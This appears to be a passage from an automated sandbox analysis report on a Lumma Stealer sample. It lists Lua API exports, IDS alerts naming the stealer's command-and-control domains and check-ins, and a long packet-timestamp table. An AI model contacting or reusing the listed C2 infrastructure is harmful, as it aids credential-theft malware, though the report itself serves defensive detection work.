                                                                                        lua_pushcclosure910x578ab0
                                                                                        lua_pushfstring920x578a70
                                                                                        lua_pushinteger930x578910
                                                                                        lua_pushlightuserdata940x578b90
                                                                                        lua_pushlstring950x578940
                                                                                        lua_pushnil960x5788d0
                                                                                        lua_pushnumber970x5788f0
                                                                                        lua_pushstring980x5789e0
                                                                                        lua_pushthread990x578bb0
                                                                                        lua_pushvalue1000x578360
                                                                                        lua_pushvfstring1010x578a30
                                                                                        lua_rawequal1020x5784d0
                                                                                        lua_rawget1030x578e20
                                                                                        lua_rawgeti1040x578e70
                                                                                        lua_rawgetp1050x578ec0
                                                                                        lua_rawlen1060x578770
                                                                                        lua_rawset1070x579300
                                                                                        lua_rawseti1080x579390
                                                                                        lua_rawsetp1090x579450
                                                                                        lua_resume1100x5838f0
                                                                                        lua_rotate1110x578290
                                                                                        lua_setallocf1120x579da0
                                                                                        lua_setfield1130x5791e0
                                                                                        lua_setglobal1140x5790f0
                                                                                        lua_sethook1150x581bd0
                                                                                        lua_seti1160x579210
                                                                                        lua_setlocal1170x581e00
                                                                                        lua_setmetatable1180x579510
                                                                                        lua_settable1190x579130
                                                                                        lua_settop1200x5781d0
                                                                                        lua_setupvalue1210x579ef0
                                                                                        lua_setuservalue1220x5795b0
                                                                                        lua_status1230x579a20
                                                                                        lua_stringtonumber1240x5785f0
                                                                                        lua_toboolean1250x5786c0
                                                                                        lua_tocfunction1260x5787e0
                                                                                        lua_tointegerx1270x578660
                                                                                        lua_tolstring1280x5786f0
                                                                                        lua_tonumberx1290x578610
                                                                                        lua_topointer1300x578860
                                                                                        lua_tothread1310x578840
                                                                                        lua_touserdata1320x578810
                                                                                        lua_type1330x5783a0
                                                                                        lua_typename1340x5783d0
                                                                                        lua_upvalueid1350x57a000
                                                                                        lua_upvaluejoin1360x57a050
                                                                                        lua_version1370x578160
                                                                                        lua_xmove1380x5780e0
                                                                                        lua_yieldk1390x583a90
                                                                                        luaopen_base1400x57e280
                                                                                        luaopen_bit321410x57e370
                                                                                        luaopen_coroutine1420x580110
                                                                                        luaopen_debug1430x581af0
                                                                                        luaopen_io1440x587d60
                                                                                        luaopen_math1450x58af30
                                                                                        luaopen_os1460x58e3b0
                                                                                        luaopen_package1470x58c430
                                                                                        luaopen_string1480x596fa0
                                                                                        luaopen_table1490x599130
                                                                                        luaopen_utf81500x59aa80
                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-10-13T11:42:13.803098+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731188.114.97.3443TCP
                                                                                        2024-10-13T11:42:13.803098+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731188.114.97.3443TCP
                                                                                        2024-10-13T11:42:13.808579+02002056570ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)1192.168.2.4585181.1.1.153UDP
                                                                                        2024-10-13T11:42:14.310273+02002056571ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)1192.168.2.449732188.114.96.3443TCP
                                                                                        2024-10-13T11:42:14.760733+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449732188.114.96.3443TCP
                                                                                        2024-10-13T11:42:14.760733+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732188.114.96.3443TCP
                                                                                        2024-10-13T11:42:14.762853+02002056568ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)1192.168.2.4539881.1.1.153UDP
                                                                                        2024-10-13T11:42:14.795220+02002056566ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)1192.168.2.4502891.1.1.153UDP
                                                                                        2024-10-13T11:42:15.301012+02002056567ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)1192.168.2.449733172.67.152.13443TCP
                                                                                        2024-10-13T11:42:15.827479+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449733172.67.152.13443TCP
                                                                                        2024-10-13T11:42:15.827479+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733172.67.152.13443TCP
                                                                                        2024-10-13T11:42:15.834870+02002056564ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)1192.168.2.4632421.1.1.153UDP
                                                                                        2024-10-13T11:42:16.329296+02002056565ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)1192.168.2.449734104.21.77.78443TCP
                                                                                        2024-10-13T11:42:16.767536+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449734104.21.77.78443TCP
                                                                                        2024-10-13T11:42:16.767536+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449734104.21.77.78443TCP
                                                                                        2024-10-13T11:42:16.813607+02002056562ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)1192.168.2.4639261.1.1.153UDP
                                                                                        2024-10-13T11:42:17.561594+02002056563ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)1192.168.2.449735172.67.140.193443TCP
                                                                                        2024-10-13T11:42:18.000399+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449735172.67.140.193443TCP
                                                                                        2024-10-13T11:42:18.000399+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449735172.67.140.193443TCP
                                                                                        2024-10-13T11:42:18.026733+02002056560ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)1192.168.2.4554211.1.1.153UDP
                                                                                        2024-10-13T11:42:18.521222+02002056561ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)1192.168.2.449737104.21.30.221443TCP
                                                                                        2024-10-13T11:42:18.937149+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449737104.21.30.221443TCP
                                                                                        2024-10-13T11:42:18.937149+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737104.21.30.221443TCP
                                                                                        2024-10-13T11:42:18.960890+02002056558ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)1192.168.2.4637341.1.1.153UDP
                                                                                        2024-10-13T11:42:19.460477+02002056559ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)1192.168.2.449741172.67.141.136443TCP
                                                                                        2024-10-13T11:42:19.886594+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449741172.67.141.136443TCP
                                                                                        2024-10-13T11:42:19.886594+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449741172.67.141.136443TCP
                                                                                        2024-10-13T11:42:19.899655+02002056556ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)1192.168.2.4495011.1.1.153UDP
                                                                                        2024-10-13T11:42:20.429036+02002056557ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)1192.168.2.449743188.114.96.3443TCP
                                                                                        2024-10-13T11:42:20.873314+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449743188.114.96.3443TCP
                                                                                        2024-10-13T11:42:20.873314+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449743188.114.96.3443TCP
                                                                                        2024-10-13T11:42:22.179172+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449745104.102.49.254443TCP
                                                                                        2024-10-13T11:42:23.168391+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449746104.21.53.8443TCP
                                                                                        2024-10-13T11:42:23.168391+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449746104.21.53.8443TCP
                                                                                        2024-10-13T11:42:24.345642+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449747104.21.53.8443TCP
                                                                                        2024-10-13T11:42:24.345642+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449747104.21.53.8443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 13, 2024 11:42:12.777863026 CEST49731443192.168.2.4188.114.97.3
                                                                                        Oct 13, 2024 11:42:12.777926922 CEST44349731188.114.97.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:12.778018951 CEST49731443192.168.2.4188.114.97.3
                                                                                        Oct 13, 2024 11:42:12.780844927 CEST49731443192.168.2.4188.114.97.3
                                                                                        Oct 13, 2024 11:42:12.780877113 CEST44349731188.114.97.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:13.271801949 CEST44349731188.114.97.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:13.271893024 CEST49731443192.168.2.4188.114.97.3
                                                                                        Oct 13, 2024 11:42:13.275587082 CEST49731443192.168.2.4188.114.97.3
                                                                                        Oct 13, 2024 11:42:13.275614977 CEST44349731188.114.97.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:13.276026011 CEST44349731188.114.97.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:13.316584110 CEST49731443192.168.2.4188.114.97.3
                                                                                        Oct 13, 2024 11:42:13.353097916 CEST49731443192.168.2.4188.114.97.3
                                                                                        Oct 13, 2024 11:42:13.353137970 CEST49731443192.168.2.4188.114.97.3
                                                                                        Oct 13, 2024 11:42:13.353317022 CEST44349731188.114.97.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:13.803191900 CEST44349731188.114.97.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:13.803451061 CEST44349731188.114.97.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:13.803527117 CEST49731443192.168.2.4188.114.97.3
                                                                                        Oct 13, 2024 11:42:13.805727005 CEST49731443192.168.2.4188.114.97.3
                                                                                        Oct 13, 2024 11:42:13.805747986 CEST44349731188.114.97.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:13.820444107 CEST49732443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:13.820549965 CEST44349732188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:13.820641994 CEST49732443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:13.820971966 CEST49732443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:13.821008921 CEST44349732188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:14.310065985 CEST44349732188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:14.310272932 CEST49732443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:14.320581913 CEST49732443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:14.320668936 CEST44349732188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:14.321041107 CEST44349732188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:14.326405048 CEST49732443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:14.326405048 CEST49732443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:14.326544046 CEST44349732188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:14.760730982 CEST44349732188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:14.761008978 CEST44349732188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:14.761219025 CEST49732443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:14.761585951 CEST49732443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:14.761585951 CEST49732443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:14.761653900 CEST44349732188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:14.761693001 CEST44349732188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:14.809989929 CEST49733443192.168.2.4172.67.152.13
                                                                                        Oct 13, 2024 11:42:14.810074091 CEST44349733172.67.152.13192.168.2.4
                                                                                        Oct 13, 2024 11:42:14.810170889 CEST49733443192.168.2.4172.67.152.13
                                                                                        Oct 13, 2024 11:42:14.810465097 CEST49733443192.168.2.4172.67.152.13
                                                                                        Oct 13, 2024 11:42:14.810507059 CEST44349733172.67.152.13192.168.2.4
                                                                                        Oct 13, 2024 11:42:15.300923109 CEST44349733172.67.152.13192.168.2.4
                                                                                        Oct 13, 2024 11:42:15.301012039 CEST49733443192.168.2.4172.67.152.13
                                                                                        Oct 13, 2024 11:42:15.303069115 CEST49733443192.168.2.4172.67.152.13
                                                                                        Oct 13, 2024 11:42:15.303097010 CEST44349733172.67.152.13192.168.2.4
                                                                                        Oct 13, 2024 11:42:15.303620100 CEST44349733172.67.152.13192.168.2.4
                                                                                        Oct 13, 2024 11:42:15.304918051 CEST49733443192.168.2.4172.67.152.13
                                                                                        Oct 13, 2024 11:42:15.304961920 CEST49733443192.168.2.4172.67.152.13
                                                                                        Oct 13, 2024 11:42:15.305023909 CEST44349733172.67.152.13192.168.2.4
                                                                                        Oct 13, 2024 11:42:15.827557087 CEST44349733172.67.152.13192.168.2.4
                                                                                        Oct 13, 2024 11:42:15.827801943 CEST44349733172.67.152.13192.168.2.4
                                                                                        Oct 13, 2024 11:42:15.827940941 CEST49733443192.168.2.4172.67.152.13
                                                                                        Oct 13, 2024 11:42:15.827941895 CEST49733443192.168.2.4172.67.152.13
                                                                                        Oct 13, 2024 11:42:15.828032970 CEST49733443192.168.2.4172.67.152.13
                                                                                        Oct 13, 2024 11:42:15.828071117 CEST44349733172.67.152.13192.168.2.4
                                                                                        Oct 13, 2024 11:42:15.850724936 CEST49734443192.168.2.4104.21.77.78
                                                                                        Oct 13, 2024 11:42:15.850786924 CEST44349734104.21.77.78192.168.2.4
                                                                                        Oct 13, 2024 11:42:15.850852966 CEST49734443192.168.2.4104.21.77.78
                                                                                        Oct 13, 2024 11:42:15.851329088 CEST49734443192.168.2.4104.21.77.78
                                                                                        Oct 13, 2024 11:42:15.851361990 CEST44349734104.21.77.78192.168.2.4
                                                                                        Oct 13, 2024 11:42:16.329216003 CEST44349734104.21.77.78192.168.2.4
                                                                                        Oct 13, 2024 11:42:16.329296112 CEST49734443192.168.2.4104.21.77.78
                                                                                        Oct 13, 2024 11:42:16.330992937 CEST49734443192.168.2.4104.21.77.78
                                                                                        Oct 13, 2024 11:42:16.331023932 CEST44349734104.21.77.78192.168.2.4
                                                                                        Oct 13, 2024 11:42:16.331361055 CEST44349734104.21.77.78192.168.2.4
                                                                                        Oct 13, 2024 11:42:16.333163023 CEST49734443192.168.2.4104.21.77.78
                                                                                        Oct 13, 2024 11:42:16.333379984 CEST49734443192.168.2.4104.21.77.78
                                                                                        Oct 13, 2024 11:42:16.333415031 CEST44349734104.21.77.78192.168.2.4
                                                                                        Oct 13, 2024 11:42:16.767612934 CEST44349734104.21.77.78192.168.2.4
                                                                                        Oct 13, 2024 11:42:16.767853975 CEST44349734104.21.77.78192.168.2.4
                                                                                        Oct 13, 2024 11:42:16.767954111 CEST49734443192.168.2.4104.21.77.78
                                                                                        Oct 13, 2024 11:42:16.809106112 CEST49734443192.168.2.4104.21.77.78
                                                                                        Oct 13, 2024 11:42:16.809106112 CEST49734443192.168.2.4104.21.77.78
                                                                                        Oct 13, 2024 11:42:16.809165955 CEST44349734104.21.77.78192.168.2.4
                                                                                        Oct 13, 2024 11:42:16.809191942 CEST44349734104.21.77.78192.168.2.4
                                                                                        Oct 13, 2024 11:42:16.827920914 CEST49735443192.168.2.4172.67.140.193
                                                                                        Oct 13, 2024 11:42:16.828018904 CEST44349735172.67.140.193192.168.2.4
                                                                                        Oct 13, 2024 11:42:16.828141928 CEST49735443192.168.2.4172.67.140.193
                                                                                        Oct 13, 2024 11:42:16.828444004 CEST49735443192.168.2.4172.67.140.193
                                                                                        Oct 13, 2024 11:42:16.828480005 CEST44349735172.67.140.193192.168.2.4
                                                                                        Oct 13, 2024 11:42:17.561525106 CEST44349735172.67.140.193192.168.2.4
                                                                                        Oct 13, 2024 11:42:17.561594009 CEST49735443192.168.2.4172.67.140.193
                                                                                        Oct 13, 2024 11:42:17.563613892 CEST49735443192.168.2.4172.67.140.193
                                                                                        Oct 13, 2024 11:42:17.563653946 CEST44349735172.67.140.193192.168.2.4
                                                                                        Oct 13, 2024 11:42:17.564068079 CEST44349735172.67.140.193192.168.2.4
                                                                                        Oct 13, 2024 11:42:17.565310955 CEST49735443192.168.2.4172.67.140.193
                                                                                        Oct 13, 2024 11:42:17.565346003 CEST49735443192.168.2.4172.67.140.193
                                                                                        Oct 13, 2024 11:42:17.565402985 CEST44349735172.67.140.193192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.000468016 CEST44349735172.67.140.193192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.000732899 CEST44349735172.67.140.193192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.000806093 CEST49735443192.168.2.4172.67.140.193
                                                                                        Oct 13, 2024 11:42:18.000878096 CEST49735443192.168.2.4172.67.140.193
                                                                                        Oct 13, 2024 11:42:18.000914097 CEST44349735172.67.140.193192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.000952959 CEST49735443192.168.2.4172.67.140.193
                                                                                        Oct 13, 2024 11:42:18.000968933 CEST44349735172.67.140.193192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.040836096 CEST49737443192.168.2.4104.21.30.221
                                                                                        Oct 13, 2024 11:42:18.040910959 CEST44349737104.21.30.221192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.041371107 CEST49737443192.168.2.4104.21.30.221
                                                                                        Oct 13, 2024 11:42:18.041708946 CEST49737443192.168.2.4104.21.30.221
                                                                                        Oct 13, 2024 11:42:18.041738033 CEST44349737104.21.30.221192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.521079063 CEST44349737104.21.30.221192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.521222115 CEST49737443192.168.2.4104.21.30.221
                                                                                        Oct 13, 2024 11:42:18.528666973 CEST49737443192.168.2.4104.21.30.221
                                                                                        Oct 13, 2024 11:42:18.528702021 CEST44349737104.21.30.221192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.529167891 CEST44349737104.21.30.221192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.530823946 CEST49737443192.168.2.4104.21.30.221
                                                                                        Oct 13, 2024 11:42:18.530823946 CEST49737443192.168.2.4104.21.30.221
                                                                                        Oct 13, 2024 11:42:18.530925989 CEST44349737104.21.30.221192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.937249899 CEST44349737104.21.30.221192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.937480927 CEST44349737104.21.30.221192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.937544107 CEST49737443192.168.2.4104.21.30.221
                                                                                        Oct 13, 2024 11:42:18.937755108 CEST49737443192.168.2.4104.21.30.221
                                                                                        Oct 13, 2024 11:42:18.937800884 CEST44349737104.21.30.221192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.937829018 CEST49737443192.168.2.4104.21.30.221
                                                                                        Oct 13, 2024 11:42:18.937844038 CEST44349737104.21.30.221192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.980334044 CEST49741443192.168.2.4172.67.141.136
                                                                                        Oct 13, 2024 11:42:18.980418921 CEST44349741172.67.141.136192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.980529070 CEST49741443192.168.2.4172.67.141.136
                                                                                        Oct 13, 2024 11:42:18.980947971 CEST49741443192.168.2.4172.67.141.136
                                                                                        Oct 13, 2024 11:42:18.981030941 CEST44349741172.67.141.136192.168.2.4
                                                                                        Oct 13, 2024 11:42:19.460292101 CEST44349741172.67.141.136192.168.2.4
                                                                                        Oct 13, 2024 11:42:19.460477114 CEST49741443192.168.2.4172.67.141.136
                                                                                        Oct 13, 2024 11:42:19.464502096 CEST49741443192.168.2.4172.67.141.136
                                                                                        Oct 13, 2024 11:42:19.464555979 CEST44349741172.67.141.136192.168.2.4
                                                                                        Oct 13, 2024 11:42:19.464979887 CEST44349741172.67.141.136192.168.2.4
                                                                                        Oct 13, 2024 11:42:19.478441000 CEST49741443192.168.2.4172.67.141.136
                                                                                        Oct 13, 2024 11:42:19.478441000 CEST49741443192.168.2.4172.67.141.136
                                                                                        Oct 13, 2024 11:42:19.478663921 CEST44349741172.67.141.136192.168.2.4
                                                                                        Oct 13, 2024 11:42:19.886681080 CEST44349741172.67.141.136192.168.2.4
                                                                                        Oct 13, 2024 11:42:19.886909962 CEST44349741172.67.141.136192.168.2.4
                                                                                        Oct 13, 2024 11:42:19.887178898 CEST49741443192.168.2.4172.67.141.136
                                                                                        Oct 13, 2024 11:42:19.898066044 CEST49741443192.168.2.4172.67.141.136
                                                                                        Oct 13, 2024 11:42:19.898066044 CEST49741443192.168.2.4172.67.141.136
                                                                                        Oct 13, 2024 11:42:19.898133993 CEST44349741172.67.141.136192.168.2.4
                                                                                        Oct 13, 2024 11:42:19.898217916 CEST44349741172.67.141.136192.168.2.4
                                                                                        Oct 13, 2024 11:42:19.914042950 CEST49743443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:19.914066076 CEST44349743188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:19.914133072 CEST49743443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:19.914592028 CEST49743443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:19.914601088 CEST44349743188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:20.428977013 CEST44349743188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:20.429035902 CEST49743443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:20.432763100 CEST49743443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:20.432768106 CEST44349743188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:20.433159113 CEST44349743188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:20.434214115 CEST49743443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:20.434225082 CEST49743443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:20.434302092 CEST44349743188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:20.873398066 CEST44349743188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:20.873625994 CEST44349743188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:20.873774052 CEST49743443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:20.873774052 CEST49743443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:20.873905897 CEST49743443192.168.2.4188.114.96.3
                                                                                        Oct 13, 2024 11:42:20.873914003 CEST44349743188.114.96.3192.168.2.4
                                                                                        Oct 13, 2024 11:42:20.885485888 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:20.885574102 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:20.885677099 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:20.886075020 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:20.886158943 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:21.618779898 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:21.618969917 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:21.623306036 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:21.623362064 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:21.623841047 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:21.631947994 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:21.679436922 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.179341078 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.179425001 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:22.179430008 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.179488897 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.179522991 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.179536104 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:22.179594994 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:22.179609060 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.222961903 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:22.302496910 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.302557945 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.302644968 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:22.302684069 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.302706957 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:22.302735090 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:22.309123039 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.309282064 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:22.309313059 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.309355021 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.309377909 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:22.309396982 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:22.309490919 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:22.309508085 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.309525013 CEST49745443192.168.2.4104.102.49.254
                                                                                        Oct 13, 2024 11:42:22.309531927 CEST44349745104.102.49.254192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.321861029 CEST49746443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:22.321883917 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.322068930 CEST49746443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:22.322308064 CEST49746443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:22.322319984 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.808043003 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.808163881 CEST49746443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:22.809770107 CEST49746443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:22.809773922 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.810158968 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.811688900 CEST49746443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:22.811717033 CEST49746443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:22.811773062 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:23.168406963 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:23.168538094 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:23.168598890 CEST49746443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:23.168608904 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:23.168684959 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:23.168725014 CEST49746443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:23.168729067 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:23.168894053 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:23.168943882 CEST49746443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:23.168982029 CEST49746443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:23.168991089 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:23.169003963 CEST49746443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:23.169008970 CEST44349746104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:23.244405985 CEST49747443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:23.244492054 CEST44349747104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:23.244587898 CEST49747443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:23.244843006 CEST49747443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:23.244883060 CEST44349747104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:23.744805098 CEST44349747104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:23.745068073 CEST49747443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:23.746192932 CEST49747443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:23.746248007 CEST44349747104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:23.746597052 CEST44349747104.21.53.8192.168.2.4
